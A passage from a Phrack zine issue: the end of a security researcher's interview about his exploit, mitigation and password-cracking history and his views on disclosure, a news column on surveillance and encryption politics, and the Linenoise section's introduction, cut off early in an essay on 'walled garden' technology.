"Is this a game or is it real?"  (WarGames)

"If you shame attack research, you misjudge its contribution.  Offense and
defense aren't peers.  Defense is offense's child."  (John Lambert)

|=---=[ What's your opinion about Phrack?

I was about 10 years late to the party.  I think I got my hands on a pack
of Phrack issues for the first time in 1994 or 1995.  Phrack has been
changing: it had already changed by the time I first saw it, and it has
changed since.  I think that's fine.  It doesn't need to revert to the
US-centric phreaking/anarchy zine of 1980s, nor try to play the same role
that it did in 1990s now that there are many other alternatives.

Over the many Phrack issues so far, it captures diversity and evolution of
the underground.  The diversity just among the people prophiled is of such
extent that on one hand they don't quite fit (e.g. I'm mildly offended to
be prophiled after certain other individuals had been some issues before),
but on the other that's how it is in life.  Similarly, the philes range
from utter crap (luckily not much of it, such as the uncalled-for ridicule
in the Loopbacks) to inspirational or capturing the diversity of scene
spirit or (lately) opinions on the scene dying (or maybe not), and to
quality technical content (a lot of it).

Of course, opinions on what constitutes utter crap vary.  For some of your
readers, much of what I wrote above will be whitehat crap (ethics huh?) or
just off-topic (historical software development thoughts in Phrack, huh?
where are all the sploits? yet that's the balance I preferred, as the
prophile is on me and I'm not only into (in)security and colored hats).

As I don't worship Phrack, frankly I've actually read or even skimmed over
only a minority of the issues/philes.  With my Issue #53 article and this
prophile, I've probably already spent more time writing for Phrack than
reading it.  As a Soviet joke goes, I'm a writer and not a reader.

|=---=[ What you would like to see published in Phrack?

I like good people and quality content, but I realize that the diversity is
also what makes Phrack valuable as what it has been so far.

So the diversity should be preserved, albeit not to the extent where us the
"sensitive whitehats" (really, even with some of the risque fiction I wrote
above?) or them the "terrible blackhats" would refuse to contribute to
further issues.  Of course, I don't mean these labels literally - as FX
said and I agree, undef($hat); - oh and Perl is fine with me, but I do
think the editors need to strike a balance between whatever there is.

|=---=[ What do you think is the role of Phrack in the current "scene" that
        is dominated by "cons"?

Phrack is in fact less important now that there are so many other ways to
share one's experience, research, or rants - and by far not only at cons.

What I think Phrack may continue to provide is perspective over an extended
period, including via these prophiles, as well as by soliciting and
selecting for publication articles that are of longer-term relevance.

|=---=[ Who or what inspired you to start hacking?

Friends have helped introduce me to things, and conversely I made friends
while doing things.

Technical challenges.  Curiosity to explore.  Exposure (and addiction?) to
the networked world beyond local BBSes, and survival (will I be on the net
tomorrow?)

|=---=[ We know that no one will ever admit he's part of the underground,
        but, when and how did you enter it? :>

What's underground and what's not is fuzzy, but as it happened in 1994 a
friend I had made on BBSes/FidoNet invited me (as a coder) to a group he
was starting and to private BBSes.  At about the same time, I also got on
the Internet and wanted to retain my access and to explore, and I got in
touch, via IRC and such, with folks in other countries, both demoscene and
software cracking scene.  As I recall, mARQUIS of the recently formed uCF
had released a cracked version of EXE Manager, my software protection
tool.  I joined their channel for a friendly discussion, and ended up
being invited to and joining the group.

|=---=[ What do you consider your most notable technical achievement?

May I list several that I find somewhat notable?  I think all but possibly
the most recent would have been invented by others by now.

I think I helped accelerate the move from shellcode to borrowed code, with
that 1997 posting of first ret2libc exploits.  Initially, this appeared to
have made no effect, but then things started changing, and changing a lot.

In the same posting, I also introduced what later became known as ASCII
armoring (unfortunately, a term that was already used to refer to something
unrelated: binary to text encoding in PGP).  I suggested placing code that
should be out of easy reach of exploits via C strings at addresses that
contain at least one NUL byte in them.  (In that posting, I called this a
"fix", which I now regret.  I should have written "partial mitigation".)

I was first to bring non-executable memory protections to Linux and to x86,
initially just the stack (then extended to much more by PaX Team).  This
was not unique for operating systems in general - there was already Casper
Dik's patch for Solaris on SPARC, and Digital Unix on Alpha had
non-executable stack by default - but it was new to Linux, to x86, and to
free software (Solaris was non-free).  At first, upstream maintainers
opposed this, but later (when I had given up and moved on) it was embraced
by Linux and other free and non-free operating systems.  If I had not
started that discussion/controversy at the time, and someone else did
later, maybe the persuasion timer would start ticking later as well.

JtR's incremental mode, in its initial form introduced right with version
1.0 in 1996 (and tested privately in an unreleased cracker in 1995), was
novel: being able to search a password space exhaustively, yet in a smart
order.  Before JtR, it was one or the other: dumb exhaustive search, or
smart non-exhaustive search.  (I guess NSA and the like must have had
developed approaches like this before and beyond, but I am unaware of
publications or released tools of this kind predating JtR.)  With this
approach, already on computers of the time, it was practical to crack some
non-word-based yet word-like 7- and 8-character Unix passwords.

JtR's built-in ability to train on previously cracked passwords (generate
incremental mode's sorted charsets), IIRC introduced in 1997, was probably
novel as well.  Indeed, people were optimizing wordlists, etc. based on
cracked passwords before, but not with a built-in feature of the cracker.

I was first to apply/extend bitslice DES to descrypt, also in JtR, in 1998,
running especially well on Alphas (the speedup from x86 to Alpha for the
bitslice DES code of the time was comparable to the speedup going from a
CPU to a GPU now).

With a team, we demonstrated that it is practical to have a
fully-functioning Unix-like system without SUID programs, and that it is
possible to do so much more (than others do) within the traditional Unix
permissions model.  Unfortunately, this is, with few exceptions (e.g.,
Vixie Cron is such a lucky exception), not being embraced by others.
*BSD's stay with their SUIDs, and many Linux distros go beyond the
traditional Unix permissions prematurely.

More recently, the concepts of ROM-port-hardness (first presented in my
ZeroNights 2012 talk, with the slides online so I won't explain it here)
and multiply latency hardening for password hashing, KDFs, and
cryptocoins.  Multiply latency hardening is about tying up RAM for a
duration that cannot be made many times smaller through higher bandwidth
alone, but only through also improving integer multiplication latency,
which CPUs are optimized to be very good at.  (Some attack speed
improvement is indeed possible with ASICs anyway, but not as much
improvement as there would have been without such hardening.)  It is
also applicable to other areas, such as timed-release encryption.

The above list might look like a lot done, or like too much bragging, or
like too little done.  My own assessment is too little done per time spent.

|=---=[ Related to the previous question: Can you give us some background
        information? How and why did you come up with this? Can you give us
        an anecdote story related to it?

Regarding the ret2libc exploits, as I mentioned in the 1997 posting some
credit for this goes to Pavel Machek, a Linux kernel hacker who had
challenged me with the possibility of borrowed code attacks (without such
wording at the time, I think) on my non-executable stack mitigation.
Always thinking both defense and offense, I went ahead and implemented
those very first ret2libc exploits, and posted them.

My secondary(?) motivation was "to prove that exploiting buffer overflows
should be an art", as I wrote at the end of that e-mail.  A typical buffer
overflow exploit at the time was copy-paste from Aleph1's Phrack 49
article, even replicating the misindented __asm__("movl %esp,%eax"); line.
That was dull.  Compare this to today's assortment of memory corruption
exploits, which often are pieces of art.

|=---=[ Was your most notable technical achievement also the one that was
        the most fun?

While notability can be (mis)judged through the reception by others, and
this is a reason why I chose to emphasize the ret2libc exploits, I have no
such criteria for "most fun".  These exploits certainly were fun, and there
was that satisfying feeling re-reading their code, but were they absolutely
the most fun?  I'm not sure.  Many things I did were fun.

Exploration of VM-based software obfuscation possibility was fun (even if
possibly of negative ethical value as "intellectual property" protection
might be in general, although there are other potential applications of the
idea, such as for weak "whitebox crypto in the cloud" in modern speak).
Some people liked the PoC, and there were friendly copycats.  I didn't
pursue this further as I fully went into FOSS at about the same time.
A couple of years later, I was surprised to find a disassembly of my PoC in
a printed magazine, with concerns raised that the technique could be picked
up by malware.  I think this hasn't happened, but I suspect that my PoC
might have influenced the creation of VMProtect (IIRC, it also used NOR as
an emulated instruction, but added many other instructions thereby spoiling
the idea).

There were some technical feats that were not notable in terms of influence
(either because they had no such value or because they were not exposed or
were overlooked), but certainly were fun.  I mentioned some among the
"memorable experiences".  A maybe-curious one, implemented in 1995-1996 for
DOS as JMPTRACE.EXE, was guiding a program's user and making and comparing
as many as needed dumps of the program's control flow instructions' status
(not-reached, taken, not-taken, varies) to spot the instructions changing
between two sets of dumps, and automatically generate a patch to force
program behavior to one path or the other.  It was fun to see this produce
cracks in under a minute, removing the need for any manual work in simple
cases like this.  This is extending and re-applying game cheating tools'
old idea of comparing memory dumps to spot the one right variable.  Sounds
obvious, yet I'm not aware of others having done it before.

|=---=[ When you came up with the unlink metadata attack for Mozilla's
        heap, did you look for it in other linked list allocators? Did you
        realize its full potential at that time?

Actually, the attack as originally discovered and demonstrated was not on
Mozilla's allocator, but on whatever allocators of the underlying system
Mozilla used - so yes, as the advisory I published at the time said, the
technique was shown to be applicable to glibc's and Windows' allocators of
the time.  And yes, I did realize, and maybe I should have written a
separate article on just that.  I was trying to make two points at once:
that file format parsers are a major risk, and that "heap overflows" are
exploitable in this generic way.  Arguably, placing them both in one
advisory obscured the latter, but as we see from further publications by
others, including in Phrack, it was not fully missed either.

Want an anecdote on this one as well?  I first triggered the bug when
trying to optimize a JPEG for my website.  I deleted the comment in vi, but
updated the comment length incorrectly.  The browser crashed, and I didn't
let this stay non-investigated.  (These days, I grew older and oftentimes I
just ignore software crashes, letting those bugs live.  What a pity...
although I imagine the pro-bug folks would appreciate that.)

I first exploited the bug into branching to a controlled address in gdb
before having ever looked at the corresponding source code of either
Mozilla or glibc.  It's this low-level / binary approach that enabled me to
see what was possible.  If I had switched to reviewing the source code
sooner, I might not have realized the bug was exploitable.

I only looked at Mozilla's source code and at the relevant place in glibc
for figuring out what exactly was happening in higher-level terms, and for
writing it up for others.  Oh, and for producing a reliable binary patch.

|=---=[ Some of your older publications are "offensive", while in the
        recent years you seem to have focused on more "defensive" research.
        Do you agree with this statement? If yes, what were the reasons for
        this change?

I was always exploring both sides since I got into "software protection"
and (in)security.  It is possible that I alternated my focus between the
two over the years, yet I can't imagine me working on defensive research
without at the same time considering attacks on the solution or mitigation
being designed.  For example, my Phrack 53 article was both defensive and
offensive, and I dropped what later became known as hashDoS in it.

It is true that I mostly quit developing memory corruption exploits after
having published just a few (innovative) ones in late 1990s.  A reason for
this is that the desired effect was achieved, whether due to my work or/and
otherwise: people started producing advanced rather than dull exploits.

Similarly, I was one of the first (possibly the first?) to exploit a buffer
overflow on the Windows platform (in 1996, then published Windows 95 and NT
shellcodes in January 1997), but I quit almost right away as other people
also started bringing the Unix attack knowledge onto Windows.

I still co-maintain John the Ripper, which is an offensive tool.

I recently participated in a project to implement energy-efficient bcrypt
cracking on Epiphany and FPGAs, which is also offensive.

I designed yescrypt, which is defensive, but in the process I went through
lots of attacks on it.

Yes, our Openwall GNU/*/Linux project is defensive.

|=---=[ Related to the previous question: Which of the two do you think
        bears more fruit for a researcher; offensive or defensive research?
        Which of the two increased your learning and understanding more?

I'd say offensive as you need to consider attacks when working on defensive
research.  What may happen in practice is that when you naively go
defensive-only, others break your defenses (e.g., my early and naive
software protection schemes) and make you learn in that way.  If you're
lucky, or if you deliberately provide the incentive (bug bounty?), this
happens early on, before there's too much at stake (and then you start
thinking like an attacker as well... or you fail as a defender).

|=---=[ What's your take on the IT security industry vs. "the underground"?

A large part of today's IT security industry that I'm in contact with grew
from 1990s maybe-underground, so it's people we have a common understanding
with.  It's good.

As to the industry vs. today's underground, I don't know.  I guess there's
some overlap.

There's also some overlap of the civilian IT security industry (and
presumably the underground) with the military, intelligence, and law
enforcement.  Some are contributing to ethically questionable efforts.
(I am not implying that any work for governments is ethically questionable.
A lot of it isn't.  That's where the Internet came from.)

There's also the military rhetoric (such as "cyberwar"), which gets picked
up by non-tech yet powerful people.  This is a theme of my ZeroNights 2014
keynote game: "Yesterday infosec was such an easy game to play.  Now we
need a place to hide away?"  Was it really a game back then?  And is it
still a game now, or is it time to hide away (move on to the many
non-security areas where we can constructively hack useful things without
ethical uncertainty)?  I have no "authoritative answers" to these; I just
like to remind us to ponder on this in our decision-making on what to work
on next.

Finally, there are marketing-mostly companies and activities, which are
leeching funds without doing much else.  These happen to provide a false
sense of security, and vulnerabilities in the security software itself.

Overall, I think most IT security expenditures are not cost-effective, but
it's similar for other large industries.  Wasted money isn't necessarily
bad per se.  Money has no inherent value, it's just an instrument in the
economy and it's voting power.  What matters is whether the expenditures
result in people wasting their and others' lives on unhappily doing useless
work or not.  Unfortunately, they do, but not to as bad an extent as it
might seem at first.  (And yes, this also affects distribution of wealth.)

Besides IT security industry, there's also much increased attention
(compared to 20 years ago) to security elsewhere in IT, as well as much
improved knowledge of how to tackle safer design of IT systems.  This is a
lot more cost-effective than spending on security on its own or as an
afterthought.  It provides not only security, but robustness, and in ways
that impose fewer restrictions on the users.  Speaking of restrictive
security, this reminds me of anti-security and its less reasonable aspects:

Did you possibly mean your question in context of the (arguably eroded)
anti-security movement of 2002-2009 (arguably different from its earlier
form of 2001)?  I think that's a false dichotomy built upon several likely
flawed assumptions.  As I understand, one assumption was that the security
industry's growth was contributing to decline of the underground.  I think
it actually was change and not decline.  Yes, some people were growing up
and moving on and into the industry (no, this didn't make them "enemies"),
but also a new generation was joining the underground.  Phrack largely lost
its anarchy aspect, even prompting "fake Phrack" during that period, but
whatever happened to Phrack, etc. didn't necessarily speak of the entire
underground.  In fact, that very movement exemplified the diversity that
continued to exist and flourish (even if with some aspects I personally
wouldn't condone, since those infringed upon freedom of choice by others).
Another assumption was that the security industry still depended, and in a
"bad way", on sustained scaremongering and on real security threats found
in full disclosure publications.  I think that even if (hypothetically)
those ceased, the industry would grow at roughly the same pace, and it
wouldn't be any more focused on real threats.  On the contrary, I think it
would be spending a larger fraction of resources on people unhappily doing
useless work, with no reduction in total resources spent.

This is my prophile, and thus my opinion; I do not claim it is the ultimate
truth.  I hope I haven't built a strawman, but in case I have please take
the above paragraph on its own merits (not necessarily referring to the
specific movement).  I was mostly not around during those years, so I could
well have missed crucial detail, and I understand that anti-security wasn't
only about those things (and I think initially not about them at all).

|=---=[ What is your stance on full-disclosure vs non-disclosure? Are there
        situations where both are needed, or is it one or the other?

I generally favor full disclosure, but I don't oppose occasional use of
coordinated disclosure prior to the full disclosure.  I do oppose excessive
use of coordinated disclosure, as well as excessive embargo periods.
I also buy into Ted Unangst's suggestion to call this "selective
disclosure", with the negative connotation.  This is why I agreed for
Openwall to host not only the oss-security list (where full disclosure is
practiced), but also the (linux-)distros lists (for advance notification
to distro vendors, PGP re-encrypted).  As someone hosting them, I get to
dictate policy, not letting issues stay in the limbo for too long (and
forcing them to be brought to oss-security).  Obviously, what's
"excessive" and "too long" is subjective (there is a published policy on
that for our lists, but how we came up with this specific policy is
subjective).  And yes, it's necessarily "selective".

I am generally against non-disclosure, but there may be exceptions.  As I
understand, it exists out of intent to use or/and profit off of one's
finding, concerns of others taking advantage (unfair or any at all) of
one's finding defensively (you doing free bug hunting for the vendor),
offensively (use of your recent disclosure for attacks on not-yet-patched
systems), or/and commercially (scaremongering, marketing, actual security
products), concerns of getting oneself in trouble (e.g., the vendor going
after you), not wanting to lock other hackers out, increased appreciation
of the bugs (letting them live just for the sake of it), not wanting to
affect game dynamics, lack of motive (perceived need) to disclose, or/and
just laziness.  This list is probably non-exhaustive.

I think there's rarely an ethical way to profit off of a bug without its
planned public disclosure (remember, this might not be a game anymore) and
there are plenty of other ways to make decent money, including in IT
security, without such ethical compromises.  I can sympathize with many
possible reasons for one's choice not to disclose a bug, especially in
context of jailbreaks or DRM (thus, retaining the essential freedom to
fully utilize one's own devices or content).  However, it should always be
considered that information may leak or be rediscovered by others.

|=---=[ Some claim that the hacking scene is growing old and that there are
        not enough talented young people interested in hacking to replace
        it. What are your thoughts on this?

There are plenty of talented young people interested in hacking.  What may
be changing (or maybe not) is scene spirit.

|=---=[ What is your advice to the new hackers reading this?

I tried to share some maybe-wisdom throughout the pseudo-memoirs and
answers above.

FX's advice of "Try Harder 2 Be Yourself" makes sense to me -
individuality, curiosity, creativity.  Being a hacker is about all of
those things and, whatever the darker undef color folks say, it isn't
necessarily about ever hacking into systems, which might or might not even
be relevant (depending on creativity involved or lack thereof).  Last but
not least, try to be a good person, while at the same time staying
yourself.  (Few people are genuinely bad.)  This means integrity, too.

A hacker shouldn't need guidance.  If you feel like asking an old-timer for
guidance, you're probably on the wrong path.  Rather, it should be about
your own creativity, and you'd find you have more curiosity and more
things to explore than you have time for.

However, it is in fact helpful to be introduced to things you might not yet
have found on your own.  Also, it is OK to bring up specific questions -
not of the sort "what's next", thus not step-by-step guidance, but asking
in appropriate communities for advice on very specific technical issues you
already ran into.

The landscape has changed.  On one hand, the previously low-hanging fruit
has been explored, so the barrier to entry may be higher now.  On the
other, a lot of information and tools are now easily available, and there
are friendly communities that are even easier to reach than before, and
without the elitism too, so the barrier to entry may have lowered.
Overall, it's just different.  There's new low-hanging fruit too - e.g.,
for the coming "Internet of things" you'll end up building upon and
porting over the previously explored attack techniques to this new area,
and hopefully finding something creative about it as well.

It's probably riskier (and less of a game) to explore systems online now,
but on the other hand you can have plenty of rare systems in emulators/
VMs, and you can "hack" in CTFs, which really are just games (good!)  Bug
bounty programs provide you a previously unheard-of opportunity to not
only explore some systems online in some limited ways, but also get paid
for it - and it's a game (also good!)  You don't have to worry about how
you'd get online to connect to a CTF server tomorrow.  There are no such
survival challenges in today's CTFs.  You wouldn't even voluntarily go for
the headache of the network lag and frequent disconnects, even though
technically those could be simulated.  The spirit is probably very
different now.  Times change.  (But maybe not yet by this much in some
developing countries?  Just like USSR/Russia was lagging behind back then.
As a cat, I see a lot of naive mouse activity from Indonesia, so maybe it's
still like that in there, perhaps with wireless in place of dialup?)

Firmware hacking has probably stayed the same, including the spirit, and in
fact the range of opportunities has expanded.  Lots of ethically sound
opportunities there, too.

There are many ways to be a hacker without ever getting into (in)security -
e.g. hacking on non-security aspects of a free operating system - or even
without focusing on computing, although there's a hot and highly relevant
area which does involve computing: bioinformatics.

|=---=[ What is the future of hacking? The future of "the underground"?

Hacking will go on, in all meanings of the word.

The underground, the kind of it that I consider positive, might be getting
blended with other communities, although I hear there are forums that have
sort of replaced private BBSes of before.

There will also remain for-profit groups (and their forums, communities,
etc.) that technically are underground, but that's different - not the
kind of underground I possibly associated with.

Very different kinds of hacktivism will also continue, and I think these
are for human rights, transparency, protests, and attempts to influence the
game (many or most of them misguided).  Also a lot of malicious and just
for fun trolling and stalking, but masquerading as hacktivism - that's not
even hacking, but it can involve e.g. (D)DoS attacks and thus be lumped in
with hacking/hacktivism.  Also manipulation of public opinion via technical
means (automated sockpuppets, etc.), including attributed to state actors.

|=---=[ What do you think the biggest infosec challenges for the next 5
        years are/will be? And what should be done about them?

5 years is not that much, so the challenges will stay mostly the same as
today's.  Attention will be shifted to some specific areas all of a sudden,
like we've seen it happen for SSL/TLS starting with Heartbleed, but this
does not mean those areas actually suddenly started to need more attention
(maybe they needed it before as well, and/or maybe they don't deserve as
much now).

Below are some that will be changing from today's.  This does not mean
they're the absolute biggest challenges - I think the biggest are the same
as today's - but they might be among the biggest that change from today's:

Use of virtualization will increase even further, on all kinds of devices,
including with nested and mixed technologies, which will bring new code and
new bugs with it (such as in front-end software and middleware used to
manage those VMs/containers), and inconsistent/violated security
models/assumptions.  Ideally, there should be demand for under-the-hood
simplicity of such solutions, but unfortunately this demand is lacking, and
so will the supply, likely resulting in some ridiculously complex and
inconsistent systems.

Use of "microservices" will continue to increase, and so will server-side
request forgery attacks - and defenses against those.  With separation of
backend services improving, there will be an unfortunately to-be-missed
opportunity to make it privilege separation rather than merely operational
separation.

For crypto, some of those backend servers could act as HSM-alikes, but this
opportunity will also be missed due to HSM-alikes requiring HSM-like rather
than server-like sysadmin practices.

Use of centralized management will increase - config file management across
all of organization's virtual and physical servers, etc.  This means a
single point of failure, and of security compromises too.  We could have
gained intranet security boundaries through greater separation of backend
services, but instead we'll lose them through greater centralized
management.  This applies to (security) event monitoring, too.

With more levels of abstraction, (live) migration, hosting infrastructure
outsourcing, and increased use of solid-state non-volatile memories
(ranging from "disks" to "RAM"), it will be even harder (and arguably
counter-productive) to keep track of actual devices underlying the logical
assets and, even once located, to securely wipe those devices when they're
to be retired (hard to do for flash memory with over-provisioning and wear
leveling) - but people typically neglect to do this now anyway.

IPv6 deployment will increase more rapidly than it did in prior 5 years.
We'll see more talks about the inadvertent security exposures this brings.

Use of encrypted communications will continue to increase, with technical
pressure put on those who are lagging behind in protocols support (upgrade
or fall off the net).  As a side-effect, this will prevent some legacy
systems from being accessed or from talking to many newer systems.  In
some cases, we'll see fallbacks to unencrypted communications where
previously legacy encryption was being used.  In some other cases, we'll
see software updates stop being installed, thereby leaving systems exposed
to more vulnerabilities for longer.  I'd like to see a saner, case-by-case
approach here - e.g., with opportunistic encryption, there's little point
in insisting on the latest protocols (refusing legacy ones), and a
WordPress updates server isn't really helping security by denying
connections from older systems.  Unfortunately, I don't expect an
improvement in the approach taken (in part because case-by-case is
necessarily more complex than one-size-fits-all guidance), and so there
will be more collateral damage.

With luck, we'll see another spike (after 2013's) in demand and hopefully
supply for line-rate encryption in high-speed network devices, due to a
combination of genuine security-consciousness and hype and marketing
opportunities.  Assuring security of encryption provided by those typically
proprietary devices will be tough (e.g., does this one device actually
provide perfect forward secrecy?)  Ideally, there should also be demand for
at least some openness of such devices for security review.

SCADA will move even more into the spotlight, and will remain with lots of
low-hanging fruit for years.  Cars and IoT will continue to join SCADA
under the spotlight.

Control over end-user devices will continue to be taken away by the
vendors, and jailbreaks will continue too.  Arguably well-intentioned
hardware backdoors (remote management, anti-theft, etc.) will continue to
be introduced, and will remain a concern.  Open hardware projects will
advance, and more of them will be started, including in response and
trying to address these concerns.  Backdooring potential of taped out
designs at chip foundries will become more relevant and thus a topic of
more discussions.

As open CPU designs (such as RISC-V and J Core aka free SuperH) succeed,
there's also good potential for an open FPGA with a FOSS toolchain (perhaps
building upon existing FOSS projects such as Torc and Yosys).  This could
be crowd- or/and VC-funded, and having it would address some concerns.

|=---=[ Open question. Anything more you would like to say to Phrack
        readers?

I can neither confirm nor deny anything stated in this prophile.

I wrote a lot (sorry for your time!) and I included some possibly strong
opinions, but I do not mean to speak with authority.  My involvement in the
underground, if any, has been rather limited and brief, nor am I a true
old-timer (1990s wasn't that long ago).  I also would like to apologize to
past/other(?) Phrack editors as I had refused to be prophiled before on
two(?) occasions.  It felt like too much of a drag and events were too
recent.  Time had to pass so that I could provide perspective, as I tried
now.  Nothing to do with Phrack's editor teams changing, just the timing.


|=[ EOF ]=---------------------------------------------------------------=|


--------------------------------------------------------------------------------


                              ==Phrack Inc.==

                Volume 0x0f, Issue 0x45, Phile #0x03 of 0x10

|=-----------------------------------------------------------------------=|
|=------------------------=[ Phrack World News ]=------------------------=|
|=-----------------------------------------------------------------------=|
|=-----------------------=[ by the Phrack staff ]=-----------------------=|
|=-------------------------=[ staff@phrack.org ]=------------------------=|
|=-----------------------------------------------------------------------=|

Wow, 4 years have passed! One of the possible positive outcomes of slow-
paced releases of Phrack is that Phrack World News gives us the opportunity
to look back on a few years worth of happenings and ponder about the bigger
picture for a moment. First of all: Snowden. It feels like ages ago now,
but, for anyone living under a rock, in 2013 Edward Snowden [1] leveraged 
his position working at the United States National Security Agency to copy 
and later leak [2] classified documents on NSA's global surveillance 
operations. If the very previous issue of PWN [3] prophetically warned 
about the massification of surveillance as a threat to our civil 
liberties, the Snowden leaks only proved what hackers and conspiracy 
theorists had believed and proclaimed for a long time: the US government 
unlawfully spies on its own citizens as well as everyone else's.

While it is probably futile to believe that the social and political
reactions to the Snowden leaks have had any meaningful impact on the NSA's
operations, the disclosed information is an invaluable resource to validate
that governments will go a long way to collect intelligence as broadly and
deeply as they can. The leaks have shown that the tactics employed by NSA
ranged from the widespread tapping of phone (e.g. voice, SMS) and network
traffic to more punctilious methods such as the intercept and tampering of
export computer and network equipment to insert spying implants. This does
not mean, of course, that we have global surveillance "figured out". In
fact, quite to the contrary, it should be expected that many of these
techniques have been revamped by now, and that many more are to follow, as
a natural step in the continuous endeavor for stealthiness. As such, any
effort, technical or otherwise, to safeguard your privacy is more valid
than ever.

But indeed, it seems that some of the efforts on designing and implementing
better crypto systems paid off and governments are starting to have their
monitoring and investigative capabilities limited by evolving security. One
indication of that is the growing insistence of various nations on the mind
-boggling hopelessly insane push for crypto backdoors [4]. The sad and
unfortunate wave of terrorism the world has been dealing with is repeatedly
and shamelessly used to support the lobbying for less information security.
Another (at the moment) ongoing instance of this is the significant dispute
between the FBI and Apple [5], which refuses to provide the FBI with a way
to bypass the lock screen of a terrorist's (and everyone else's) iPhone.

And sure enough the controversies involving governments and information
security do not stop there. In the past few years we have seen some nations
being more frank about their offensive capabilities [6] or sometimes
industry-sourced intelligence [7] combined with publicity on more impactful
attacks [8] helped demonstrate that hacking is increasingly a bigger deal
for nation-states. All of this action is (or has been posed as) a driving
force behind moves such as adding "cyber weapons" to the terms of the
Wassenaar agreement [9], an initiative that, if not carefully formulated,
will turn out to be not only utterly ineffective but also extremely harmful
for the practice of security research and, in consequence, to the
progressive development of information security in general. Plus, other
recent breaches, such as Gamma [10] and Hacking Team [11], tell us that
even government-affiliated organizations are freely operating without
respecting UN embargoes and international regulations anyway - ironically,
it was hackers and the security community that exposed them, and not law
enforcement. So, who is the law working for?

Lastly, and with a heart heavier than any of the topics above could ever
cause us, Phrack would like to say goodbye to a few illustrious members of
our community that have sadly passed away. Since it's been 4 years we
are not going to attempt to list out every instance, however we can
easily say that as a community we have lost some incredibly talented,
charismatic and fantastic people, and we feel the loss greatly.


Live free,

- The Phrack Staff


[1]  - https://en.wikipedia.org/wiki/Edward_Snowden
[2]  - http://www.businessinsider.com/snowden-leaks-timeline-2014-6
[3]  - http://phrack.org/issues/68/3.html
[4]  - http://www.theguardian.com/technology/2015/nov/18/
       us-europe-reignite-debate-back-door-encryption-paris-attacks
[5]  - http://www.wired.com/2016/02/apple-brief-fbi-response-iphone/
[6]  - http://www.wired.com/2016/01/
       nsa-hacker-chief-explains-how-to-keep-him-out-of-your-system/
[7]  - http://www.wired.com/2013/02/chinese-army-linked-to-hacks/
[8]  - http://arstechnica.com/security/2015/06/
       why-the-biggest-government-hack-ever-got-past-opm-dhs-and-nsa/
[9]  - http://blog.erratasec.com/2015/05/some-notes-about-wassenaar.html
[10] - http://www.zdnet.com/article/
       top-govt-spyware-company-hacked-gammas-finfisher-leaked/
[11] - http://www.wired.com/2015/07/
       hacking-team-breach-shows-global-spying-firm-run-amok/

|=[ EOF ]=---------------------------------------------------------------=|


--------------------------------------------------------------------------------


                              ==Phrack Inc.==

                Volume 0x0f, Issue 0x45, Phile #0x04 of 0x10

|=-----------------------------------------------------------------------=|
|=-----------------------=[  L I N E N O I S E  ]=-----------------------=|
|=-----------------------------------------------------------------------=|
|=-------------------------=[     various     ]=-------------------------=|
|=-----------------------------------------------------------------------=|


An old Phrack Staff member and friend used to say that "a strong Linenoise
makes a good release". 

We begin our journey with an interesting philosophical article, "Hacker
Luddites" by an anonymous author. TL;DR, ever had an iPhone? Have you
realized you don't actually own something you paid several hundreds of
bucks to acquire? The "cloud era" trend, which has convinced many people
as well businesses, to literally grant owning rights for their data to
large corporations, is now everywhere. How is it affecting our state of
mind and where is this going?

Our technical part is very strong. Baudsurfer developed an interesting ASM
chess game in just 256 bytes; read the heavily-commented code and feel the
nostalgia in your bones. More old-school goodness in a lovely article
dealing with secure shells and how one can exploit common misconfigurations
to bypass various limitations and break out of restricted environments.
Articles like this have a lot to offer to the hacking community. We urge
our dear readers to follow DangerMouse's example and submit more articles
like his!

The next article has a strange back story. We received this submission
long ago and we decided to publish it. Admittedly, a lot of time has passed
since then. The author has stopped replying to mails, but he was originally
positive about publishing his work. Read it and see how you can cause
short ID key collisions in GPG. As our everyday computing machines become
increasingly powerful, such attacks become more and more realistic.

Following that are two excellent short articles exploring subjects every
exploit developer is doomed to deal with, namely boundary conditions and
shellcoding. Our rotten haxor chown has written a nice guide on how to use
Microsoft's Z3 solver to facilitate the process of exploit development.
Recently (well, maybe not so recently, lulz), there has been a shift
towards more formal methods even by old-school haxors who have always
preferred and obeyed the KISS (Keep It Simple, Stupid!) primitive. Hackers
have understood that the process of vulnerability discovery as well as
exploit development can be augmented by modern mathematics and maybe become
even more interesting! One cannot easily forget p64_0x08.txt, right? In the
next article, fishstiqz shows us how you can simply use your compiler to
easily build shellcodes for Windows. If you ever thought shellcode
development on Microsoft's operating system is a pain in the ass, then
this article is definitely for you.

Last but not least we have an opinion piece on the vulnerability
disclosure circus, the incentives and the related moral questions (lulz)
by two anonymous contributors. It is balanced and dispassionate and we
urge you to read it in the same manner.

That's it you greedy mofos, another strong Linenoise! Enjoy!


--[ Contents

    1 - Hacker Luddites ................................... anonymous

    2 - Chesslin .......................................... Baudsurfer

    3 - He Compels Secure Shells .......................... DangerMouse

    4 - Personalized PGP Key IDs .......................... f1los0tt1l3

    5 - How to cheat at maths ............................. chown 

    6 - Shellcode the better way, or how to just
        use your compiler ................................. fishstiqz

    7 - Resisting the Hy(p|v)e ............................ anon & anon


|=[ 0x01 ]=---=[ Hacker Luddites - anonymous ]=--------------------------=|


In the west, far gone are the days of slavery. Men live freely with their 
minds and bodies. So the idea of technology potentially limiting these 
things is absurd.

Computer technology today might not always encourage these principles of 
free mind and body though. Hardware and software is increasingly built in 
the same manner as stone walled gardens, restricting those outside the 
inner circles of technocrats. The designers decide to clutch tightly to 
their systems, defining the full set of actions allowable and therefore 
thinkable on their systems. They are limiting the potential for 
creativity, discovery, and reason in order to further profit. This profit 
is furthered by control because certain control limits piracy, stops 
malicious software from propagating, simplifies the user experience for 
the majority of consumers, and creates revenue through software-regulated 
micro decisions that constrain the full capacity of the hardware and 
software systems being sold.

Only the masters of the garden, the designers, are allowed inside the 
stone walls, where they are free to create and are conscious of the inner 
workings and plans. Those outside are not allowed inside the garden. Those 
who are not inside the circle of the original creators do not get to 
create without delegated permission. And consumers and third-party 
developers are too far down the caste system to be allowed arbitrary 
control of their own possessions.

This leaves the creators on the outside of the stoned walls dependent on 
brilliant and dedicated minds to bypass the wishes of the designers. These 
brilliant minds attain a level of consciousness about the constraints of 
the system that the designers themselves did not understand, and pass this 
on to the masses. Along the way come miscreants, thieves, and pirates.

In a free market system, if more arbitrary creation is vital in the long 
term, then more creative systems will arise to fill the need. In the short 
term, allowing feedback from the outer castes and integrating their ideas 
has been shown to be more than sufficient for sustained exponential growth 
on the rise to market domination.


Hacker Luddite: (Oxymoron) A person opposed to technology that greatly 
limits, through artificial means, human potential for consciousness, 
reason, or creativity with that same technology.

Hacker Luddites hate stone wall garden technologies. Why shouldn't a 
